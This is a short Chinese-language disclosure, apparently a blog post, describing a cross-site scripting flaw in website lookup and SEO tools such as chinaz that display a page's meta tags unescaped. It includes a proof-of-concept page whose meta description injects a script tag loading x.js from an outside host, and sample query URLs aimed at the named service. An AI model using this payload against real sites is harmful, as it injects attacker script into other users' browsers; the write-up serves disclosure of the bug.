详细说明:现在有很多网站信息查询,seo优化,网站安全检测之类的网站,这些网站通常会抓取网页的meta信息。这样如果用户的meta是恶意代码,就会出现问题。涛涛电脑知识网
站长之家等网站就有这样的问题。
测试代码,写一个简单的页面:
<html>
<head><meta name="keywords" content='tmxk.org' />
<meta name="description" content="<script src=http://tmxk.org/x.js style=''" /></head><body></body></html>
然后到站长之家去检测,
seo.chinaz.com/?host=unbet8.com%2f%
截图:
其它举例:
#url=unbet8.com/0.htm
?url=unbet8.com%2F%